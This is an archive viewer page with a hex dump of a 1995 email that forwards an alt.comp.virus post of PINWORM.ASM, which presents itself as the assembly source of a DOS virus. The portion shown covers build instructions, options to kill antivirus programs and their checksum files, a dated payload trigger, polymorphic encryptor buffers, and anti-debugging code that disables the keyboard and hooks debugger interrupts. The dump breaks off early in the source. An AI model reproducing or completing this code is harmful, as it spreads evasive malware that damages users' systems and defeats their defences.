home *** CD-ROM | disk | FTP | other *** search
open in: 
MacOS 8.1
|
Win98
|
DOS
view JSON data
|
view as text
This file was processed as: Mailbox/MIME Entity
(archive/mbox).
You can browse this item here: pinworm.asm
| Confidence | Program | Detection | Match Type | Support
|
|---|
| 100%
| dexvert
| Mailbox/MIME Entity (archive/mbox)
| magic
| Supported |
| 100%
| dexvert
| Internet Message Format (text/imf)
| magic
| Supported |
| 100%
| dexvert
| Assembly Source File (text/asm)
| magic
| Supported |
| 1%
| dexvert
| Text File (text/txt)
| fallback
| Supported |
| 100%
| file
| Mailbox text, 1st line "From smtp Thu Jan 26 14:38 EST 1995", ISO-8859 text
| default
| |
| 100%
| TrID
| E-Mail message (Var. 2)
| default
| |
| 100%
| perlTextCheck
| Likely Text (Perl)
| default
| |
| 100%
| siegfried
| x-fmt/111 Plain Text File
| default
| |
| 100%
| detectItEasy
| Format: plain text[LF]
| default (weak)
| |
| 100%
| xdgMime
| application/mbox
| default
|
|
hex view+--------+-------------------------+-------------------------+--------+--------+
|00000000| 46 72 6f 6d 20 73 6d 74 | 70 20 54 68 75 20 4a 61 |From smt|p Thu Ja|
|00000010| 6e 20 32 36 20 31 34 3a | 33 38 20 45 53 54 20 31 |n 26 14:|38 EST 1|
|00000020| 39 39 35 0a 52 65 63 65 | 69 76 65 64 3a 20 66 72 |995.Rece|ived: fr|
|00000030| 6f 6d 20 69 64 73 2e 6e | 65 74 20 62 79 20 50 4f |om ids.n|et by PO|
|00000040| 42 4f 58 2e 6a 77 75 2e | 65 64 75 3b 20 54 68 75 |BOX.jwu.|edu; Thu|
|00000050| 2c 20 32 36 20 4a 61 6e | 20 39 35 20 31 34 3a 33 |, 26 Jan| 95 14:3|
|00000060| 38 20 45 53 54 0a 44 61 | 74 65 3a 20 54 68 75 2c |8 EST.Da|te: Thu,|
|00000070| 20 32 36 20 4a 61 6e 20 | 31 39 39 35 20 31 34 3a | 26 Jan |1995 14:|
|00000080| 30 36 3a 34 30 20 2d 30 | 35 30 30 20 28 45 53 54 |06:40 -0|500 (EST|
|00000090| 29 0a 46 72 6f 6d 3a 20 | 69 64 73 2e 6e 65 74 21 |).From: |ids.net!|
|000000a0| 4a 4f 53 48 55 41 57 20 | 28 4a 4f 53 48 55 41 57 |JOSHUAW |(JOSHUAW|
|000000b0| 29 0a 54 6f 3a 20 70 6f | 62 6f 78 2e 6a 77 75 2e |).To: po|box.jwu.|
|000000c0| 65 64 75 21 6a 6f 73 68 | 75 61 77 20 0a 43 6f 6e |edu!josh|uaw .Con|
|000000d0| 74 65 6e 74 2d 4c 65 6e | 67 74 68 3a 20 32 33 37 |tent-Len|gth: 237|
|000000e0| 31 37 0a 43 6f 6e 74 65 | 6e 74 2d 54 79 70 65 3a |17.Conte|nt-Type:|
|000000f0| 20 62 69 6e 61 72 79 0a | 4d 65 73 73 61 67 65 2d | binary.|Message-|
|00000100| 49 64 3a 20 3c 39 35 30 | 31 32 36 31 34 30 36 34 |Id: <950|12614064|
|00000110| 30 2e 38 36 38 64 40 69 | 64 73 2e 6e 65 74 3e 0a |0.868d@i|ds.net>.|
|00000120| 53 74 61 74 75 73 3a 20 | 52 4f 0a 0a 54 6f 3a 20 |Status: |RO..To: |
|00000130| 6a 6f 73 68 75 61 77 40 | 70 6f 62 6f 78 2e 6a 77 |joshuaw@|pobox.jw|
|00000140| 75 2e 65 64 75 0a 53 75 | 62 6a 65 63 74 3a 20 28 |u.edu.Su|bject: (|
|00000150| 66 77 64 29 20 50 49 4e | 57 4f 52 4d 2e 41 53 4d |fwd) PIN|WORM.ASM|
|00000160| 0a 4e 65 77 73 67 72 6f | 75 70 73 3a 20 61 6c 74 |.Newsgro|ups: alt|
|00000170| 2e 63 6f 6d 70 2e 76 69 | 72 75 73 0a 0a 50 61 74 |.comp.vi|rus..Pat|
|00000180| 68 3a 20 70 61 70 65 72 | 62 6f 79 2e 69 64 73 2e |h: paper|boy.ids.|
|00000190| 6e 65 74 21 75 75 6e 65 | 74 21 6e 6e 74 70 2e 63 |net!uune|t!nntp.c|
|000001a0| 72 6c 2e 63 6f 6d 21 63 | 72 6c 35 2e 63 72 6c 2e |rl.com!c|rl5.crl.|
|000001b0| 63 6f 6d 21 6e 6f 74 2d | 66 6f 72 2d 6d 61 69 6c |com!not-|for-mail|
|000001c0| 0a 46 72 6f 6d 3a 20 79 | 6f 6a 69 6d 62 6f 40 63 |.From: y|ojimbo@c|
|000001d0| 72 6c 2e 63 6f 6d 20 28 | 44 6f 75 67 6c 61 73 20 |rl.com (|Douglas |
|000001e0| 4d 61 75 6c 64 69 6e 29 | 0a 4e 65 77 73 67 72 6f |Mauldin)|.Newsgro|
|000001f0| 75 70 73 3a 20 61 6c 74 | 2e 63 6f 6d 70 2e 76 69 |ups: alt|.comp.vi|
|00000200| 72 75 73 0a 53 75 62 6a | 65 63 74 3a 20 50 49 4e |rus.Subj|ect: PIN|
|00000210| 57 4f 52 4d 2e 41 53 4d | 0a 44 61 74 65 3a 20 32 |WORM.ASM|.Date: 2|
|00000220| 33 20 4a 61 6e 20 31 39 | 39 35 20 32 33 3a 33 31 |3 Jan 19|95 23:31|
|00000230| 3a 30 33 20 2d 30 38 30 | 30 0a 4f 72 67 61 6e 69 |:03 -080|0.Organi|
|00000240| 7a 61 74 69 6f 6e 3a 20 | 43 52 4c 20 44 69 61 6c |zation: |CRL Dial|
|00000250| 75 70 20 49 6e 74 65 72 | 6e 65 74 20 41 63 63 65 |up Inter|net Acce|
|00000260| 73 73 09 28 34 31 35 29 | 20 37 30 35 2d 36 30 36 |ss.(415)| 705-606|
|00000270| 30 20 20 5b 4c 6f 67 69 | 6e 3a 20 67 75 65 73 74 |0 [Logi|n: guest|
|00000280| 5d 0a 4c 69 6e 65 73 3a | 20 39 37 36 0a 4d 65 73 |].Lines:| 976.Mes|
|00000290| 73 61 67 65 2d 49 44 3a | 20 3c 33 67 32 61 62 6e |sage-ID:| <3g2abn|
|000002a0| 24 62 37 61 40 63 72 6c | 35 2e 63 72 6c 2e 63 6f |$b7a@crl|5.crl.co|
|000002b0| 6d 3e 0a 4e 4e 54 50 2d | 50 6f 73 74 69 6e 67 2d |m>.NNTP-|Posting-|
|000002c0| 48 6f 73 74 3a 20 63 72 | 6c 35 2e 63 72 6c 2e 63 |Host: cr|l5.crl.c|
|000002d0| 6f 6d 0a 58 2d 4e 65 77 | 73 72 65 61 64 65 72 3a |om.X-New|sreader:|
|000002e0| 20 54 49 4e 20 5b 76 65 | 72 73 69 6f 6e 20 31 2e | TIN [ve|rsion 1.|
|000002f0| 32 20 50 4c 32 5d 0a 0a | 3b 53 6f 6d 65 6f 6e 65 |2 PL2]..|;Someone|
|00000300| 20 70 6f 73 74 65 64 20 | 73 6f 6d 65 77 68 65 72 | posted |somewher|
|00000310| 65 20 74 68 61 74 20 74 | 68 65 79 20 6e 65 65 64 |e that t|hey need|
|00000320| 65 64 20 74 68 65 20 70 | 69 6e 77 6f 72 6d 27 73 |ed the p|inworm's|
|00000330| 20 73 6f 75 72 63 65 20 | 63 6f 64 65 20 73 6f 20 | source |code so |
|00000340| 68 65 72 65 0a 3b 69 74 | 20 69 73 20 63 6f 6d 70 |here.;it| is comp|
|00000350| 6c 69 6d 65 6e 74 73 20 | 6f 66 20 54 48 65 20 51 |liments |of THe Q|
|00000360| 55 61 52 61 4e 54 69 4e | 45 3a 20 0a 0a 3b 20 20 |UaRaNTiN|E: ..; |
|00000370| 63 6f 6d 70 69 6c 65 20 | 6c 69 6b 65 20 73 6f 3a |compile |like so:|
|00000380| 0a 3b 20 20 20 54 41 53 | 4d 20 2f 6d 20 70 69 6e |.; TAS|M /m pin|
|00000390| 77 6f 72 6d 0a 3b 20 20 | 20 54 6c 69 6e 6b 20 70 |worm.; | Tlink p|
|000003a0| 69 6e 77 6f 72 6d 0a 3b | 20 20 20 2d 2d 63 6f 6e |inworm.;| --con|
|000003b0| 76 65 72 74 20 74 6f 20 | 43 4f 4d 2d 2d 0a 3b 0a |vert to |COM--.;.|
|000003c0| 0a 63 73 65 67 09 73 65 | 67 6d 65 6e 74 0a 09 61 |.cseg.se|gment..a|
|000003d0| 73 73 75 6d 65 09 63 73 | 3a 20 63 73 65 67 2c 20 |ssume.cs|: cseg, |
|000003e0| 64 73 3a 20 63 73 65 67 | 2c 20 65 73 3a 20 63 73 |ds: cseg|, es: cs|
|000003f0| 65 67 2c 20 73 73 3a 20 | 63 73 65 67 0a 0a 3b 20 |eg, ss: |cseg..; |
|00000400| 63 6f 6e 64 69 74 69 6f | 6e 61 6c 20 63 6f 6d 70 |conditio|nal comp|
|00000410| 69 6c 61 74 69 6f 6e 2e | 2e 0a 53 45 43 4f 4e 44 |ilation.|..SECOND|
|00000420| 5f 43 52 59 50 54 20 65 | 71 75 20 31 20 20 20 20 |_CRYPT e|qu 1 |
|00000430| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000440| 20 20 3b 20 75 73 65 20 | 73 65 63 6f 6e 64 20 63 | ; use |second c|
|00000450| 72 79 70 74 6f 72 3f 0a | 58 54 52 41 5f 53 50 41 |ryptor?.|XTRA_SPA|
|00000460| 43 45 20 20 20 65 71 75 | 20 31 20 20 20 20 20 20 |CE equ| 1 |
|00000470| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000480| 3b 20 78 74 72 61 20 73 | 70 61 63 65 20 74 6f 20 |; xtra s|pace to |
|00000490| 70 72 65 76 65 6e 74 20 | 64 6f 75 62 6c 65 20 63 |prevent |double c|
|000004a0| 72 79 70 74 6f 72 3f 0a | 49 4e 43 4c 55 44 45 5f |ryptor?.|INCLUDE_|
|000004b0| 49 4e 54 33 20 65 71 75 | 20 31 20 20 20 20 20 20 |INT3 equ| 1 |
|000004c0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000004d0| 3b 20 69 6e 63 6c 75 64 | 65 20 49 4e 54 20 33 20 |; includ|e INT 3 |
|000004e0| 69 6e 20 67 61 72 62 61 | 67 65 20 63 6f 64 65 3f |in garba|ge code?|
|000004f0| 0a 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |. | |
|00000500| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000510| 20 20 20 20 20 20 20 20 | 20 3b 20 28 73 6c 6f 77 | | ; (slow|
|00000520| 73 20 74 68 65 20 6c 6f | 6f 70 20 64 6f 77 6e 20 |s the lo|op down |
|00000530| 61 6c 6f 74 29 0a 4b 49 | 4c 4c 5f 41 56 20 20 20 |alot).KI|LL_AV |
|00000540| 20 20 20 65 71 75 20 31 | 20 20 20 20 20 20 20 20 | equ 1| |
|00000550| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 3b 20 | | ; |
|00000560| 4b 69 6c 6c 20 41 56 73 | 20 61 73 20 65 78 65 63 |Kill AVs| as exec|
|00000570| 75 74 65 64 3f 0a 4b 49 | 4c 4c 5f 43 48 4b 4c 49 |uted?.KI|LL_CHKLI|
|00000580| 53 54 20 65 71 75 20 31 | 20 20 20 20 20 20 20 20 |ST equ 1| |
|00000590| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 3b 20 | | ; |
|000005a0| 4b 69 6c 6c 20 4d 53 41 | 56 2f 43 50 41 56 20 63 |Kill MSA|V/CPAV c|
|000005b0| 68 65 63 6b 73 75 6d 20 | 66 69 6c 65 7a 3f 0a 0a |hecksum |filez?..|
|000005c0| 0a 3b 20 74 68 69 6e 67 | 7a 20 74 6f 20 63 68 61 |.; thing|z to cha|
|000005d0| 6e 67 65 2e 2e 0a 6b 69 | 6c 6c 5f 64 61 74 65 20 |nge...ki|ll_date |
|000005e0| 20 20 20 65 71 75 20 20 | 20 31 39 20 20 20 20 20 | equ | 19 |
|000005f0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 3b 20 | | ; |
|00000600| 64 61 79 20 6f 66 20 74 | 68 65 20 6d 6f 6e 74 68 |day of t|he month|
|00000610| 20 74 6f 20 70 6c 61 79 | 20 77 69 74 68 20 75 73 | to play| with us|
|00000620| 65 72 0a 6d 61 78 5f 65 | 78 65 20 20 20 20 20 20 |er.max_e|xe |
|00000630| 65 71 75 20 34 20 20 20 | 20 20 20 20 20 20 20 20 |equ 4 | |
|00000640| 20 20 20 20 20 20 20 20 | 20 20 20 3b 20 6d 61 78 | | ; max|
|00000650| 20 65 78 65 20 66 69 6c | 65 20 73 69 7a 65 20 2d | exe fil|e size -|
|00000660| 68 69 67 68 20 62 79 74 | 65 0a 6d 73 67 5f 66 69 |high byt|e.msg_fi|
|00000670| 6c 65 7a 20 20 20 20 65 | 71 75 20 31 37 20 20 20 |lez e|qu 17 |
|00000680| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000690| 20 20 3b 20 6e 75 6d 62 | 65 72 20 6f 66 20 66 69 | ; numb|er of fi|
|000006a0| 6c 65 6e 61 6d 65 73 20 | 66 6f 72 20 6f 75 72 20 |lenames |for our |
|000006b0| 6d 73 67 0a 0a 3b 20 70 | 6f 6c 79 6d 6f 72 70 68 |msg..; p|olymorph|
|000006c0| 69 63 20 65 6e 67 69 6e | 65 20 6f 70 74 69 6f 6e |ic engin|e option|
|000006d0| 73 2e 2e 0a 69 6e 63 5f | 62 75 66 5f 73 69 7a 65 |s...inc_|buf_size|
|000006e0| 20 65 71 75 20 32 30 20 | 20 20 20 20 20 20 20 20 | equ 20 | |
|000006f0| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 20 49 4e | | ; IN|
|00000700| 43 20 62 75 66 0a 65 6e | 63 5f 6f 70 5f 62 73 69 |C buf.en|c_op_bsi|
|00000710| 7a 65 20 65 71 75 20 33 | 36 20 20 20 20 20 20 20 |ze equ 3|6 |
|00000720| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 3b 20 | | ; |
|00000730| 45 4e 43 20 62 75 66 0a | 70 74 72 5f 62 75 66 5f |ENC buf.|ptr_buf_|
|00000740| 73 69 7a 65 20 65 71 75 | 20 33 36 20 20 20 20 20 |size equ| 36 |
|00000750| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000760| 3b 20 50 54 52 20 62 75 | 66 0a 63 6e 74 5f 62 75 |; PTR bu|f.cnt_bu|
|00000770| 66 5f 73 69 7a 65 20 65 | 71 75 20 33 36 20 20 20 |f_size e|qu 36 |
|00000780| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000790| 20 20 3b 20 43 4e 54 26 | 4f 50 0a 64 6a 5f 62 75 | ; CNT&|OP.dj_bu|
|000007a0| 66 5f 73 69 7a 65 20 20 | 65 71 75 20 33 36 20 20 |f_size |equ 36 |
|000007b0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000007c0| 20 20 20 3b 20 44 45 43 | 26 4a 4d 50 0a 6c 6f 6f | ; DEC|&JMP.loo|
|000007d0| 70 5f 64 69 73 70 5f 73 | 69 7a 65 20 65 71 75 20 |p_disp_s|ize equ |
|000007e0| 32 30 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |20 | |
|000007f0| 20 20 20 20 20 3b 20 6c | 6f 6f 70 20 62 75 66 20 | ; l|oop buf |
|00000800| 72 61 6e 67 65 0a 3b 63 | 6f 6d 70 69 6c 65 20 61 |range.;c|ompile a|
|00000810| 6e 64 20 63 68 61 6e 67 | 65 20 74 68 65 20 62 65 |nd chang|e the be|
|00000820| 6c 6f 77 20 65 71 75 61 | 74 65 20 74 6f 20 74 68 |low equa|te to th|
|00000830| 65 20 73 65 63 6f 6e 64 | 20 62 79 74 65 20 6f 66 |e second| byte of|
|00000840| 20 74 68 65 20 4a 4e 5a | 20 6f 70 65 72 61 6e 64 | the JNZ| operand|
|00000850| 0a 6f 72 67 5f 6c 6f 6f | 70 20 65 71 75 20 20 20 |.org_loo|p equ |
|00000860| 20 38 44 68 20 20 20 20 | 20 20 20 20 20 20 20 20 | 8Dh | |
|00000870| 20 20 20 20 20 20 20 20 | 20 3b 20 6f 72 69 67 69 | | ; origi|
|00000880| 6e 61 6c 20 4a 4e 5a 20 | 6f 66 66 73 65 74 0a 0a |nal JNZ |offset..|
|00000890| 0a 73 69 67 6e 61 6c 20 | 20 20 20 20 20 20 65 71 |.signal | eq|
|000008a0| 75 20 30 46 41 30 31 68 | 20 20 20 20 20 20 20 20 |u 0FA01h| |
|000008b0| 20 20 20 20 20 20 20 20 | 20 3b 20 41 58 3d 73 69 | | ; AX=si|
|000008c0| 67 6e 61 6c 2f 49 4e 54 | 20 32 31 68 2f 69 6e 73 |gnal/INT| 21h/ins|
|000008d0| 74 61 6c 6c 61 74 69 6f | 6e 20 63 68 6b 0a 76 73 |tallatio|n chk.vs|
|000008e0| 61 66 65 5f 77 6f 72 64 | 20 20 20 65 71 75 20 35 |afe_word| equ 5|
|000008f0| 39 34 35 68 20 20 20 20 | 20 20 20 20 20 20 20 20 |945h | |
|00000900| 20 20 20 20 20 20 3b 20 | 6d 61 67 69 63 20 77 6f | ; |magic wo|
|00000910| 72 64 20 66 6f 72 20 56 | 53 41 46 45 2f 56 57 41 |rd for V|SAFE/VWA|
|00000920| 54 43 48 20 41 50 49 0a | 65 6e 63 5f 73 69 7a 65 |TCH API.|enc_size|
|00000930| 20 65 71 75 09 6f 66 66 | 73 65 74 20 66 69 72 73 | equ.off|set firs|
|00000940| 74 5f 63 72 79 70 74 2d | 6f 66 66 73 65 74 20 65 |t_crypt-|offset e|
|00000950| 6e 63 72 79 70 74 0a 65 | 6e 63 32 5f 73 69 7a 65 |ncrypt.e|nc2_size|
|00000960| 20 65 71 75 09 6f 66 66 | 73 65 74 20 63 6f 64 65 | equ.off|set code|
|00000970| 5f 73 74 61 72 74 2d 6f | 66 66 73 65 74 20 66 69 |_start-o|ffset fi|
|00000980| 72 73 74 5f 63 72 79 70 | 74 0a 72 65 61 6c 5f 73 |rst_cryp|t.real_s|
|00000990| 74 61 72 74 20 65 71 75 | 09 6f 66 66 73 65 74 20 |tart equ|.offset |
|000009a0| 64 6a 5f 62 75 66 2b 33 | 09 09 3b 20 73 74 61 72 |dj_buf+3|..; star|
|000009b0| 74 69 6e 67 20 6c 6f 63 | 61 74 69 6f 6e 20 6f 66 |ting loc|ation of|
|000009c0| 20 65 6e 63 72 79 74 65 | 64 20 63 6f 64 65 0a 0a | encryte|d code..|
|000009d0| 0a 6f 72 67 09 30 68 09 | 09 09 09 3b 20 68 65 6c |.org.0h.|...; hel|
|000009e0| 6c 61 63 69 6f 75 73 20 | 45 58 45 20 6f 66 66 73 |lacious |EXE offs|
|000009f0| 65 74 20 63 61 6c 63 73 | 20 69 66 20 21 30 0a 73 |et calcs| if !0.s|
|00000a00| 74 61 72 74 3a 0a 0a 3b | 2d 2d 2d 2d 20 45 6e 63 |tart:..;|---- Enc|
|00000a10| 72 79 70 74 6f 72 2f 44 | 65 63 72 79 70 74 6f 72 |ryptor/D|ecryptor|
|00000a20| 20 4c 6f 63 61 74 69 6f | 6e 0a 3b 20 45 61 63 68 | Locatio|n.; Each|
|00000a30| 20 6f 70 63 6f 64 65 20 | 68 61 73 20 70 72 65 64 | opcode |has pred|
|00000a40| 65 66 69 6e 65 64 20 72 | 61 6e 67 65 73 20 74 6f |efined r|anges to|
|00000a50| 20 6d 6f 76 65 20 77 69 | 74 68 69 6e 20 2d 20 6f | move wi|thin - o|
|00000a60| 6e 63 65 20 74 68 65 20 | 6f 70 63 6f 64 65 20 69 |nce the |opcode i|
|00000a70| 73 0a 3b 20 64 65 74 65 | 72 6d 69 6e 65 64 2c 20 |s.; dete|rmined, |
|00000a80| 69 74 20 69 73 20 70 6c | 61 63 65 64 20 61 74 20 |it is pl|aced at |
|00000a90| 74 68 65 20 64 65 63 69 | 64 65 64 20 6c 6f 63 61 |the deci|ded loca|
|00000aa0| 74 69 6f 6e 20 77 69 74 | 68 69 6e 20 74 68 65 20 |tion wit|hin the |
|00000ab0| 62 75 66 66 65 72 2e 0a | 3b 20 30 20 62 79 74 65 |buffer..|; 0 byte|
|00000ac0| 73 20 63 6f 6e 73 74 61 | 6e 74 0a 3b 0a 09 65 6e |s consta|nt.;..en|
|00000ad0| 63 72 79 70 74 3a 0a 09 | 70 74 72 5f 62 75 66 09 |crypt:..|ptr_buf.|
|00000ae0| 64 62 20 70 74 72 5f 62 | 75 66 5f 73 69 7a 65 2d |db ptr_b|uf_size-|
|00000af0| 33 20 64 75 70 20 28 39 | 30 68 29 0a 09 64 62 09 |3 dup (9|0h)..db.|
|00000b00| 30 42 45 68 0a 09 64 77 | 09 72 65 61 6c 5f 73 74 |0BEh..dw|.real_st|
|00000b10| 61 72 74 2b 31 30 30 68 | 0a 09 65 6e 63 72 79 70 |art+100h|..encryp|
|00000b20| 74 6f 72 3a 0a 09 63 6e | 74 5f 62 75 66 09 64 62 |tor:..cn|t_buf.db|
|00000b30| 20 63 6e 74 5f 62 75 66 | 5f 73 69 7a 65 2d 33 20 | cnt_buf|_size-3 |
|00000b40| 64 75 70 28 39 30 68 29 | 0a 09 64 62 09 30 42 38 |dup(90h)|..db.0B8|
|00000b50| 68 09 09 09 3b 20 41 58 | 3a 62 38 0a 20 20 20 20 |h...; AX|:b8. |
|00000b60| 20 20 20 20 64 77 20 20 | 20 20 20 20 6f 66 66 73 | dw | offs|
|00000b70| 65 74 20 76 65 6e 64 2d | 6f 66 66 73 65 74 20 64 |et vend-|offset d|
|00000b80| 6a 5f 62 75 66 0a 09 65 | 6e 63 5f 6c 6f 6f 70 3a |j_buf..e|nc_loop:|
|00000b90| 0a 09 6c 6f 6f 70 5f 64 | 69 73 70 20 64 62 20 6c |..loop_d|isp db l|
|00000ba0| 6f 6f 70 5f 64 69 73 70 | 5f 73 69 7a 65 20 64 75 |oop_disp|_size du|
|00000bb0| 70 28 39 30 68 29 0a 09 | 69 6e 63 5f 62 75 66 09 |p(90h)..|inc_buf.|
|00000bc0| 64 62 20 69 6e 63 5f 62 | 75 66 5f 73 69 7a 65 20 |db inc_b|uf_size |
|00000bd0| 64 75 70 28 39 30 68 29 | 0a 09 65 6e 63 5f 6f 70 |dup(90h)|..enc_op|
|00000be0| 5f 62 75 66 20 64 62 20 | 65 6e 63 5f 6f 70 5f 62 |_buf db |enc_op_b|
|00000bf0| 73 69 7a 65 20 64 75 70 | 28 39 30 68 29 0a 09 6d |size dup|(90h)..m|
|00000c00| 69 73 63 5f 62 75 66 20 | 64 77 20 39 30 39 30 68 |isc_buf |dw 9090h|
|00000c10| 0a 09 77 6f 72 64 5f 69 | 6e 63 20 64 62 20 39 30 |..word_i|nc db 90|
|00000c20| 68 0a 09 64 6a 5f 62 75 | 66 09 64 62 20 64 6a 5f |h..dj_bu|f.db dj_|
|00000c30| 62 75 66 5f 73 69 7a 65 | 2d 33 20 64 75 70 20 28 |buf_size|-3 dup (|
|00000c40| 39 30 68 29 0a 09 64 65 | 63 09 61 78 0a 09 6a 6e |90h)..de|c.ax..jn|
|00000c50| 7a 09 65 6e 63 5f 6c 6f | 6f 70 09 09 3b 20 66 6f |z.enc_lo|op..; fo|
|00000c60| 72 20 6f 72 69 67 2e 20 | 6f 6e 6c 79 0a 09 72 65 |r orig. |only..re|
|00000c70| 74 5f 62 79 74 65 20 64 | 62 20 30 39 30 68 09 09 |t_byte d|b 090h..|
|00000c80| 3b 20 43 33 68 20 6f 72 | 20 61 20 4e 4f 50 20 65 |; C3h or| a NOP e|
|00000c90| 71 75 69 76 2e 0a 66 69 | 72 73 74 5f 63 72 79 70 |quiv..fi|rst_cryp|
|00000ca0| 74 3a 20 09 09 09 09 3b | 20 65 6e 64 20 6f 66 20 |t: ....;| end of |
|00000cb0| 66 69 72 73 74 20 63 72 | 79 70 74 6f 72 0a 0a 0a |first cr|yptor...|
|00000cc0| 3b 2d 2d 2d 2d 20 53 65 | 63 6f 6e 64 20 65 6e 63 |;---- Se|cond enc|
|00000cd0| 72 79 70 74 6f 72 0a 3b | 20 57 68 6f 73 65 20 6f |ryptor.;| Whose o|
|00000ce0| 6e 6c 79 20 70 75 72 70 | 6f 73 65 20 69 73 20 74 |nly purp|ose is t|
|00000cf0| 6f 20 74 65 61 72 20 74 | 68 65 20 73 68 69 74 20 |o tear t|he shit |
|00000d00| 6f 75 74 20 6f 66 20 64 | 65 62 75 67 67 65 72 73 |out of d|ebuggers|
|00000d10| 2e 20 49 74 20 6f 62 76 | 69 6f 75 73 6c 79 0a 3b |. It obv|iously.;|
|00000d20| 20 69 73 6e 27 74 20 69 | 6e 76 69 6e 63 69 62 6c | isn't i|nvincibl|
|00000d30| 65 2c 20 62 75 74 20 77 | 69 6c 6c 20 61 74 20 6c |e, but w|ill at l|
|00000d40| 65 61 73 74 20 6b 65 65 | 70 20 74 68 65 20 6c 61 |east kee|p the la|
|00000d50| 6d 65 72 7a 20 61 6e 64 | 20 69 67 6e 6f 72 61 6e |merz and| ignoran|
|00000d60| 74 20 6d 6f 72 6f 6e 73 | 0a 3b 20 6c 69 6b 65 20 |t morons|.; like |
|00000d70| 50 61 74 74 69 20 48 6f | 66 66 6d 61 6e 20 6f 75 |Patti Ho|ffman ou|
|00000d80| 74 20 6f 66 20 74 68 65 | 20 63 6f 64 65 2e 0a 3b |t of the| code..;|
|00000d90| 0a 3b 20 5f 20 55 73 65 | 73 20 72 65 76 65 72 73 |.; _ Use|s revers|
|00000da0| 65 20 64 69 72 65 63 74 | 69 6f 6e 20 77 6f 72 64 |e direct|ion word|
|00000db0| 20 58 4f 52 20 65 6e 63 | 72 79 70 74 69 6f 6e 0a | XOR enc|ryption.|
|00000dc0| 3b 20 5f 20 55 73 65 73 | 20 74 68 65 20 66 6f 6c |; _ Uses| the fol|
|00000dd0| 6c 6f 77 69 6e 67 20 74 | 65 63 68 6e 69 71 75 65 |lowing t|echnique|
|00000de0| 73 3a 0a 3b 20 20 20 20 | 5f 20 4a 4d 50 20 69 6e |s:.; |_ JMP in|
|00000df0| 74 6f 20 6d 69 64 64 6c | 65 20 6f 66 20 6f 70 65 |to middl|e of ope|
|00000e00| 72 61 6e 64 0a 3b 20 20 | 20 20 5f 20 52 65 70 6c |rand.; | _ Repl|
|00000e10| 61 63 65 20 77 6f 72 64 | 20 61 66 74 65 72 20 43 |ace word| after C|
|00000e20| 41 4c 4c 20 74 6f 20 6b | 69 6c 6c 20 73 74 65 70 |ALL to k|ill step|
|00000e30| 70 69 6e 67 20 6f 76 65 | 72 20 63 61 6c 6c 0a 3b |ping ove|r call.;|
|00000e40| 20 20 20 20 5f 20 4b 69 | 6c 6c 73 20 49 4e 54 20 | _ Ki|lls INT |
|00000e50| 31 20 76 65 63 74 6f 72 | 0a 3b 20 20 20 20 5f 20 |1 vector|.; _ |
|00000e60| 44 69 73 61 62 6c 65 73 | 20 4b 65 79 62 6f 61 72 |Disables| Keyboar|
|00000e70| 64 20 76 69 61 20 50 6f | 72 74 20 32 31 68 0a 3b |d via Po|rt 21h.;|
|00000e80| 20 20 20 20 5f 20 52 65 | 76 65 72 73 65 20 64 69 | _ Re|verse di|
|00000e90| 72 65 63 74 69 6f 6e 20 | 65 6e 63 72 79 70 74 69 |rection |encrypti|
|00000ea0| 6f 6e 20 70 72 65 76 65 | 6e 74 73 20 73 74 65 70 |on preve|nts step|
|00000eb0| 70 69 6e 67 20 70 61 73 | 74 20 6c 6f 6f 70 0a 3b |ping pas|t loop.;|
|00000ec0| 20 20 20 20 5f 20 55 73 | 65 73 20 53 50 20 61 73 | _ Us|es SP as|
|00000ed0| 20 61 20 63 72 75 63 69 | 61 6c 20 64 61 74 61 20 | a cruci|al data |
|00000ee0| 72 65 67 69 73 74 65 72 | 20 69 6e 20 73 6f 6d 65 |register| in some|
|00000ef0| 20 6c 6f 63 61 74 69 6f | 6e 73 20 2d 20 69 66 0a | locatio|ns - if.|
|00000f00| 3b 20 20 20 20 20 20 74 | 68 65 20 64 65 62 75 67 |; t|he debug|
|00000f10| 67 65 72 20 75 73 65 73 | 20 74 68 65 20 70 72 6f |ger uses| the pro|
|00000f20| 67 72 61 6d 27 73 20 73 | 74 61 63 6b 2c 20 74 68 |gram's s|tack, th|
|00000f30| 65 6e 20 69 74 20 6d 61 | 79 20 76 65 72 79 20 77 |en it ma|y very w|
|00000f40| 65 6c 6c 0a 3b 20 20 20 | 20 20 20 70 68 75 63 6b |ell.; | phuck|
|00000f50| 20 74 68 69 6e 67 7a 20 | 75 70 20 6e 69 63 65 6c | thingz |up nicel|
|00000f60| 79 2e 0a 3b 20 20 20 20 | 5f 20 55 73 65 73 20 53 |y..; |_ Uses S|
|00000f70| 6f 66 74 2d 49 63 65 20 | 49 4e 54 20 33 20 41 50 |oft-Ice |INT 3 AP|
|00000f80| 49 20 74 6f 20 6c 6f 63 | 6b 20 69 74 20 75 70 20 |I to loc|k it up |
|00000f90| 69 66 20 69 6e 20 6d 65 | 6d 6f 72 79 2e 0a 3b 0a |if in me|mory..;.|
|00000fa0| 09 73 74 69 09 09 09 09 | 3b 20 66 69 78 20 43 4c |.sti....|; fix CL|
|00000fb0| 49 20 69 6e 20 67 61 72 | 62 61 67 65 20 63 6f 64 |I in gar|bage cod|
|00000fc0| 65 0a 09 64 62 09 30 42 | 44 68 09 09 09 3b 20 4d |e..db.0B|Dh...; M|
|00000fd0| 4f 56 20 42 50 2c 58 58 | 58 58 0a 62 70 5f 63 61 |OV BP,XX|XX.bp_ca|
|00000fe0| 6c 63 09 64 77 09 30 31 | 30 30 68 0a 20 20 20 20 |lc.dw.01|00h. |
|00000ff0| 20 20 20 20 70 75 73 68 | 20 20 20 20 64 73 20 65 | push| ds e|
